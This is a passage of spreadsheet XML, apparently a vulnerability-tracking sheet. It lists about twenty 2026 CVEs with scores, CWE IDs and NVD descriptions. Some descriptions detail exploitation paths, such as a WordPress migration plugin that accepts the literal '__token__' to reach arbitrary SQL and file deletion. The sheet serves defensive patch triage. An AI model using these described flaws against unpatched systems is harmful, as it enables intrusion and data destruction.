          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.0, the DELETE /api/v1/folders/{id} handler in backend/open_webui/routers/folders.py allowed a user granted write access to a shared chat folder to permanently delete chats and messages belonging to the folder owner. The cascade following the authorization check is bound to the folder owner's id, but the subfolder check accepted any inherited write grant instead of requiring ownership or administrator status. A collaborator can destroy the owner's subtree or force-move chats out of it when delete_contents=false. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70494</t>
        </is>
      </c>
    </row>
    <row r="1868">
      <c r="A1868" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="C1868" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1868" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1868" s="5" t="inlineStr"/>
      <c r="F1868" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1868" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1868" s="5" t="inlineStr"/>
      <c r="I1868" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1868" s="5" t="inlineStr"/>
      <c r="K1868" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1868" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M1868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="1869">
      <c r="A1869" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71308</t>
        </is>
      </c>
      <c r="C1869" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1869" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1869" s="5" t="inlineStr"/>
      <c r="F1869" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1869" s="5" t="inlineStr"/>
      <c r="H1869" s="5" t="inlineStr"/>
      <c r="I1869" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1869" s="5" t="inlineStr"/>
      <c r="K1869" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L1869" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. From 0.5.0 until 1.9.3, certificate create, upload, and edit requests accepted replaces[] or replacements identifiers that AssociatedCertificateSchema resolved with fetch_objects without a CertificatePermission check. Assigning those objects to Certificate.replaces invoked an append listener that disabled the victim certificate notifications and marked it as replaced. The victim was then excluded from get_all_pending_reissue, and certificate_rotate could deploy the attacker certificate to endpoints serving the victim. An authenticated non-read-only user could target certificates for which the user had no ownership or role, suppress lifecycle automation, and cause fleet-wide TLS disruption or unauthorized substitution. The fix authorizes every referenced replacement certificate before mutation. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M1869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71308</t>
        </is>
      </c>
    </row>
    <row r="1870">
      <c r="A1870" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71320</t>
        </is>
      </c>
      <c r="C1870" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1870" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1870" s="5" t="inlineStr"/>
      <c r="F1870" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1870" s="5" t="inlineStr"/>
      <c r="H1870" s="5" t="inlineStr"/>
      <c r="I1870" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1870" s="5" t="inlineStr"/>
      <c r="K1870" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="L1870" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.4.0 until 3.21.10 and 4.5.1, an attacker can inject a template key through /__nuxt_island/ props into a dynamic component when `vue.runtimeCompiler: true` is enabled, causing template execution in the Nitro process. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M1870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71320</t>
        </is>
      </c>
    </row>
    <row r="1871">
      <c r="A1871" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71407</t>
        </is>
      </c>
      <c r="C1871" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1871" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1871" s="5" t="inlineStr"/>
      <c r="F1871" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1871" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H1871" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios</t>
        </is>
      </c>
      <c r="I1871" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1871" s="5" t="inlineStr"/>
      <c r="K1871" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1871" s="5" t="inlineStr">
        <is>
          <t>A Stack-based Buffer Overflow vulnerability [CWE-121] vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6 may allow an unauthenticated attacker who can bypass stack protection and ASLR to execute arbitrary code or commands in the context of the WAD daemon via crafted sockets, only if the explicit proxy is configured with Kerberos authentication and SOCKS enabled.</t>
        </is>
      </c>
      <c r="M1871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71407</t>
        </is>
      </c>
    </row>
    <row r="1872">
      <c r="A1872" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72903</t>
        </is>
      </c>
      <c r="C1872" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1872" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1872" s="5" t="inlineStr"/>
      <c r="F1872" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1872" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1872" s="5" t="inlineStr"/>
      <c r="I1872" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1872" s="5" t="inlineStr"/>
      <c r="K1872" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1872" s="5" t="inlineStr">
        <is>
          <t>Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.235, a malicious SFTP server can return a backslash traversal filename through entry.name. In tabby-ssh/src/session/sftp.ts, SFTPSession.readdir() and _makeFile() use POSIX path processing that preserves the backslashes as ordinary filename characters. In tabby-ssh/src/components/sftpPanel.component.ts, downloadFolderRecursive() propagates item.name into the local relative path. In tabby-electron/src/services/platform.service.ts, ElectronDirectoryDownload.createFile() passes that path to Windows-native path.join(), and in tabby-electron/src/sftpContextMenu.ts, EditSFTPContextMenu.edit() passes item.name to path.join() for the temporary edit path. Windows interprets the preserved backslashes and parent-directory components as traversal, allowing attacker-controlled content to be created or overwritten outside the selected download directory or temporary edit directory. This issue is fixed in version 1.0.235.</t>
        </is>
      </c>
      <c r="M1872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72903</t>
        </is>
      </c>
    </row>
    <row r="1873">
      <c r="A1873" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72921</t>
        </is>
      </c>
      <c r="C1873" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1873" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1873" s="5" t="inlineStr"/>
      <c r="F1873" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1873" s="5" t="inlineStr"/>
      <c r="H1873" s="5" t="inlineStr"/>
      <c r="I1873" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1873" s="5" t="inlineStr"/>
      <c r="K1873" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1873" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system. Prior to 4.24, the weed/server/filer_server_handlers.go allowed_prefixes authorization check used strings.HasPrefix on raw path strings, so a filer JWT scoped to /tenant1 also authorized sibling paths such as /tenant1234, /tenant1-old, and /tenant1backup, enabling cross-tenant reads and writes with a valid scoped token. This issue is fixed in version 4.24.</t>
        </is>
      </c>
      <c r="M1873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72921</t>
        </is>
      </c>
    </row>
    <row r="1874">
      <c r="A1874" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72936</t>
        </is>
      </c>
      <c r="C1874" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1874" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1874" s="5" t="inlineStr"/>
      <c r="F1874" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1874" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1874" s="5" t="inlineStr"/>
      <c r="I1874" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1874" s="5" t="inlineStr"/>
      <c r="K1874" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1874" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t>
        </is>
      </c>
    </row>
    <row r="1875">
      <c r="A1875" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72981</t>
        </is>
      </c>
      <c r="C1875" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1875" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1875" s="5" t="inlineStr"/>
      <c r="F1875" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1875" s="5" t="inlineStr"/>
      <c r="H1875" s="5" t="inlineStr"/>
      <c r="I1875" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1875" s="5" t="inlineStr"/>
      <c r="K1875" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1875" s="5" t="inlineStr">
        <is>
          <t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t>
        </is>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="C1876" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1876" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1876" s="5" t="inlineStr"/>
      <c r="F1876" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1876" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1876" s="5" t="inlineStr"/>
      <c r="I1876" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1876" s="5" t="inlineStr"/>
      <c r="K1876" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1876" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73223</t>
        </is>
      </c>
      <c r="C1877" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1877" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1877" s="5" t="inlineStr"/>
      <c r="F1877" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1877" s="5" t="inlineStr"/>
      <c r="H1877" s="5" t="inlineStr"/>
      <c r="I1877" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1877" s="5" t="inlineStr"/>
      <c r="K1877" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1877" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious SFTP server to write attacker-controlled content outside the temporary directory because the server-controlled filename name used by editWithSystemEditor in src/client/components/sftp/file-item.jsx is interpolated into path.resolve without sanitization. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M1877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73223</t>
        </is>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73225</t>
        </is>
      </c>
      <c r="C1878" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1878" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1878" s="5" t="inlineStr"/>
      <c r="F1878" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1878" s="5" t="inlineStr"/>
      <c r="H1878" s="5" t="inlineStr"/>
      <c r="I1878" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1878" s="5" t="inlineStr"/>
      <c r="K1878" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1878" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious FTP or SFTP server to write attacker-controlled content outside the selected download directory because recursive transfers in src/client/components/file-transfer/transfer.jsx pass server-supplied file.name and folder.name values to resolve without sanitization. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M1878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73225</t>
        </is>
      </c>
    </row>
    <row r="1879">
      <c r="A1879" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73227</t>
        </is>
      </c>
      <c r="C1879" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1879" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1879" s="5" t="inlineStr"/>
      <c r="F1879" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1879" s="5" t="inlineStr"/>
      <c r="H1879" s="5" t="inlineStr"/>
      <c r="I1879" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1879" s="5" t="inlineStr"/>
      <c r="K1879" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1879" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.15.120, electerm allows a malicious RDP server to write attacker-controlled content outside the selected save directory because the RDP clipboard download path in src/client/components/rdp/file-transfer.js passes the server-controlled CLIPRDR filename fileInfo.name to osResolve without sanitization. This issue is fixed in version 3.15.120.</t>
        </is>
      </c>
      <c r="M1879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73227</t>
        </is>
      </c>
    </row>
    <row r="1880">
      <c r="A1880" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73286</t>
        </is>
      </c>
      <c r="C1880" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1880" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1880" s="5" t="inlineStr"/>
      <c r="F1880" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1880" s="5" t="inlineStr"/>
      <c r="H1880" s="5" t="inlineStr"/>
      <c r="I1880" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1880" s="5" t="inlineStr"/>
      <c r="K1880" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1880" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.12, RustFS get_condition_values folds attacker-controlled request headers from HeaderMap into server-derived userid, username, principaltype, groups, versionid, signatureversion, jwt:, and ldap: condition keys, allowing authenticated callers to satisfy identity-based policy conditions. This issue is fixed in version 1.0.0-beta.12.</t>
        </is>
      </c>
      <c r="M1880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73286</t>
        </is>
      </c>
    </row>
    <row r="1881">
      <c r="A1881" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73289</t>
        </is>
      </c>
      <c r="C1881" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1881" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1881" s="5" t="inlineStr"/>
      <c r="F1881" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1881" s="5" t="inlineStr"/>
      <c r="H1881" s="5" t="inlineStr"/>
      <c r="I1881" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1881" s="5" t="inlineStr"/>
      <c r="K1881" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1881" s="5" t="inlineStr">
        <is>
          <t>RustFS is a distributed object storage system built in Rust. Prior to 1.0.0-beta.12, RustFS evaluates the ForAllValues: and ForAnyValue: set qualifiers with the negated string operators StringNotEquals, StringNotEqualsIgnoreCase, StringNotLike, ArnNotEquals, and ArnNotLike using each other's semantics because crates/policy/src/policy/function/string.rs negates the aggregate result after eval or eval_like instead of negating each request-value predicate before quantification. Partially overlapping policy and request value sets can therefore make an Allow condition grant access to an excluded principal or make a Deny guardrail fail, including policies based on jwt:groups and jwt:roles; absent keys also receive the opposite ForAllValues: and ForAnyValue: behavior. This issue is fixed in version 1.0.0-beta.12.</t>
        </is>
      </c>
      <c r="M1881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73289</t>
        </is>
      </c>
    </row>
    <row r="1882">
      <c r="A1882" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73334</t>
        </is>
      </c>
      <c r="C1882" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1882" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1882" s="5" t="inlineStr"/>
      <c r="F1882" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1882" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1882" s="5" t="inlineStr">
        <is>
          <t>apache:parquet</t>
        </is>
      </c>
      <c r="I1882" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1882" s="5" t="inlineStr"/>
      <c r="K1882" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1882" s="5" t="inlineStr">
        <is>
          <t>Potential problem for users of the org.apache.parquet.crypto.keytools package in Apache Parquet, versions 1.12 to 1.18. 
This package enables users to encrypt Parquet files via an envelope encryption mechanism that wraps (encrypts) data keys via a Key Management Service (KMS). 
On the reader side, the KMS URL can be application-controlled or file-controlled.
If the user does not leverage application control for this parameter, a file-controlled KMS URL is forwarded to a pluggable KmsClient implementation. 
If the pluggable implementation does not perform host validation, a KMS token can be sent to a malicious host set by an attacker in the file.
Before the problem is fixed, users are recommended to leverage application control for KMS URL parameter in readers (versions 1.12-1.18).
After the problem is fixed (presumably in version 1.19), the upgrade will disable file-controlled KMS URL by default. Users of the KMS URL parameter 
will have two options then: leverage application control for KMS URL parameter in readers, or enable file-controlled KMS URL (via a new app parameter).
The latter option will explicitly require (in the new parameter documentation) to validate the KMS URL and use authentication in the custom implementation of the KMS client plug in.</t>
        </is>
      </c>
      <c r="M1882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73334</t>
        </is>
      </c>
    </row>
    <row r="1883">
      <c r="A1883" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73659</t>
        </is>
      </c>
      <c r="C1883" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1883" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1883" s="5" t="inlineStr"/>
      <c r="F1883" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1883" s="5" t="inlineStr"/>
      <c r="H1883" s="5" t="inlineStr"/>
      <c r="I1883" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1883" s="5" t="inlineStr"/>
      <c r="K1883" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1883" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev is the open-source platform for building AI workflows in TypeScript. From 4.4.2 until 4.5.0, the packet presign routes in apps/webapp/app/routes/api.v1.packets.$.ts pass a caller-controlled filename through resolveStoreProtocolForPacketPresign to generatePresignedUrl and generatePresignedRequest in apps/webapp/app/v3/objectStore.server.ts, allowing .. traversal to escape the packets/&lt;projectRef&gt;/&lt;env&gt;/ object-store prefix and enabling a project API key to read or overwrite another organization's offloaded task payloads and outputs on multi-organization self-hosted instances. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M1883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73659</t>
        </is>
      </c>
    </row>
    <row r="1884">
      <c r="A1884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75021</t>
        </is>
      </c>
      <c r="C1884" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1884" s="5" t="inlineStr"/>
      <c r="F1884" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1884" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1884" s="5" t="inlineStr"/>
      <c r="I1884" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1884" s="5" t="inlineStr"/>
      <c r="K1884" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="L1884" s="5" t="inlineStr">
        <is>
          <t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t>
        </is>
      </c>
      <c r="M1884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t>
        </is>
      </c>
    </row>
    <row r="1885">
      <c r="A1885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75464</t>
        </is>
      </c>
      <c r="C1885" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1885" s="5" t="inlineStr"/>
      <c r="F1885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1885" s="5" t="inlineStr"/>
      <c r="H1885" s="5" t="inlineStr"/>
      <c r="I1885" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1885" s="5" t="inlineStr"/>
      <c r="K1885" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L1885" s="5" t="inlineStr">
        <is>
          <t>OneNav 1.2.4 contains an authenticated arbitrary file deletion vulnerability via import_link().</t>
        </is>
      </c>
      <c r="M1885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75464</t>
        </is>
      </c>
    </row>
    <row r="1886">
      <c r="A1886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76009</t>
        </is>
      </c>
      <c r="C1886" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1886" s="5" t="inlineStr"/>
      <c r="F1886" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1886" s="5" t="inlineStr"/>
      <c r="H1886" s="5" t="inlineStr"/>
      <c r="I1886" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1886" s="5" t="inlineStr"/>
      <c r="K1886" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1886" s="5" t="inlineStr">
        <is>
          <t>The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 3.9.8 via the `NCWM_Kitconnect::run()` function. This is due to the plugin registering the `/wp-json/next_cart/v1/migration` REST route with `permission_callback` set to `__return_true` and relying on a hardcoded fallback value of `__token__` in `get_option('nextcart_token', '__token__')` when the `nextcart_token` option has not yet been written to the database. This makes it possible for unauthenticated attackers to bypass authentication to the migration endpoint by supplying the literal string `__token__` as the token, gaining access to privileged handlers that pass attacker-controlled SQL directly to `$wpdb-&gt;query()` and `$wpdb-&gt;get_results()` — enabling arbitrary SQL execution including administrator account creation — and pass an attacker-controlled path to `unlink()`, enabling arbitrary file deletion and full site takeover. The hardcoded fallback is reachable whenever the `nextcart_token` option has not yet been populated, which occurs after WP-CLI, network, or programmatic plugin activation without a subsequent authenticated `wp-admin` visit, as token generation is deferred to `admin_init` via `register_settings()`.</t>
        </is>
      </c>
      <c r="M1886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76009</t>
        </is>
      </c>
    </row>
    <row r="1887">
      <c r="A1887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77317</t>
        </is>
      </c>
      <c r="C1887" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1887" s="5" t="inlineStr"/>
      <c r="F1887" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1887" s="5" t="inlineStr"/>
      <c r="H1887" s="5" t="inlineStr"/>
      <c r="I1887" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1887" s="5" t="inlineStr"/>
      <c r="K1887" s="5" t="inlineStr">
        <is>
